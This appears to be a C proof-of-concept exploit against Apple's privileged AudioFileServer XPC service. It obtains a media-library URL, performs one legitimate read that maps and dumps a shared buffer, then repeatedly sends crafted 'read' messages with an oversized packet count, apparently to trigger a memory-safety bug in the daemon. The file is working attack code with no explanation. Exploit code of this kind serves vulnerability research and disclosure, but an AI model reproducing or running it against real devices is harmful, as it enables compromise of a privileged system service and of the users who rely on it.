#include "xpc_poc.h"

#include "media.h"

#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>

#include <pthread.h>



xpc_connection_t connect_to_xpc_service() {
  xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.audio.AudioFileServer", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
    
  xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
    xpc_type_t t = xpc_get_type(event);
    printf("received an event\n");
    printf("description: %s\n", xpc_copy_description(event));
  });
  xpc_connection_resume(conn);
  return conn;
}

void legit_request(char* media_url) {
  xpc_connection_t conn = connect_to_xpc_service();
  printf("connection: %p\n", conn);
  
  
  xpc_object_t open_msg = xpc_dictionary_create(NULL, NULL, 0);
  xpc_dictionary_set_uint64(open_msg, "type", 'open');
  xpc_dictionary_set_data(open_msg, "data", media_url, strlen(media_url)+1);
  
  xpc_object_t open_reply = xpc_connection_send_message_with_reply_sync(conn, open_msg);
  printf("open reply: %s\n", xpc_copy_description(open_reply));
  
  
  
  xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
  xpc_dictionary_set_uint64(msg, "type", 'read');
  xpc_dictionary_set_uint64(msg, "numbytes", 0x20000); //0x8000);
  xpc_dictionary_set_uint64(msg, "numpackets", 100); //0xffffa00);
  xpc_dictionary_set_int64(msg, "startingPacket", 0);
  
  printf("request: %s\n", xpc_copy_description(msg));
  xpc_object_t reply = xpc_connection_send_message_with_reply_sync(conn, msg);
  

  
  
  printf("reply: %s\n", xpc_copy_description(reply));
  
  // get the fd and mmap it:
  int fd = xpc_dictionary_dup_fd(reply, "bufFD");
  printf("got fd %d from the legit request\n", fd);
  
  uint64_t bufsize = xpc_dictionary_get_uint64(reply, "bufsize");
  
  void* mmap_base = mmap(NULL, bufsize, PROT_READ, MAP_FILE | MAP_SHARED, fd, 0);
  printf("mmap_base: %p\n", mmap_base);
  
  if (mmap_base) {
    printf("map success! let's dump it:\n");
    for (int i = 0; i < bufsize/8; i++) {
      uint64_t* buf_u64 = mmap_base;
      printf("+%08x : %016llx\n", i*8, buf_u64[i]);
    }
  }
  
  xpc_release(msg);
  xpc_release(reply);
  
  xpc_object_t close_msg = xpc_dictionary_create(NULL, NULL, 0);
  xpc_dictionary_set_uint64(close_msg, "type", 'clos');
  
  printf("close request: %s\n", xpc_copy_description(close_msg));
  xpc_object_t close_reply = xpc_connection_send_message_with_reply_sync(conn, close_msg);
  printf("close reply: %s\n", xpc_copy_description(close_reply));
  
  xpc_release(close_msg);
  xpc_release(close_reply);
  xpc_release(conn);
}

void* thread_func(void* arg) {


  char* media_url = list_media_items();
  if (!media_url) {
    printf("not authorized yet, please allow!\n");
    return NULL;
  }
  printf("got an ipod-library url hopefully: %s\n", media_url);
  
  legit_request(media_url);

  
  for (int i = 0; i < 4; i++) {
  
  xpc_connection_t conn = connect_to_xpc_service();
  printf("connection: %p\n", conn);

  
  // open the URL:
  xpc_object_t open_msg = xpc_dictionary_create(NULL, NULL, 0);
  xpc_dictionary_set_uint64(open_msg, "type", 'open');
  xpc_dictionary_set_data(open_msg, "data", media_url, strlen(media_url)+1);
  
  xpc_object_t open_reply = xpc_connection_send_message_with_reply_sync(conn, open_msg);
  printf("open reply: %s\n", xpc_copy_description(open_reply));
  

  
    xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
    xpc_dictionary_set_uint64(msg, "type", 'read');
    uint64_t delta = 0x10000;//0;
    xpc_dictionary_set_uint64(msg, "numbytes", 0x10000 + delta); //0x8000);
    xpc_dictionary_set_uint64(msg, "numpackets", 0xffff200 - (delta>>4)); //0xffffa00);
    xpc_dictionary_set_int64(msg, "startingPacket", 0);
  
    printf("request: %s\n", xpc_copy_description(msg));
    xpc_object_t reply = xpc_connection_send_message_with_reply_sync(conn, msg);
    printf("reply: %s\n", xpc_copy_description(reply));
    xpc_release(msg);
    xpc_release(reply);

  xpc_object_t close_msg = xpc_dictionary_create(NULL, NULL, 0);
  xpc_dictionary_set_uint64(close_msg, "type", 'clos');
  
  printf("close request: %s\n", xpc_copy_description(close_msg));
  xpc_object_t close_reply = xpc_connection_send_message_with_reply_sync(conn, close_msg);
  printf("close reply: %s\n", xpc_copy_description(close_reply));
  
  xpc_release(close_msg);
  xpc_release(close_reply);
  xpc_release(conn);
  usleep(50*1024);

  }
  return NULL;
}

void run_poc() {
  thread_func(NULL);
}
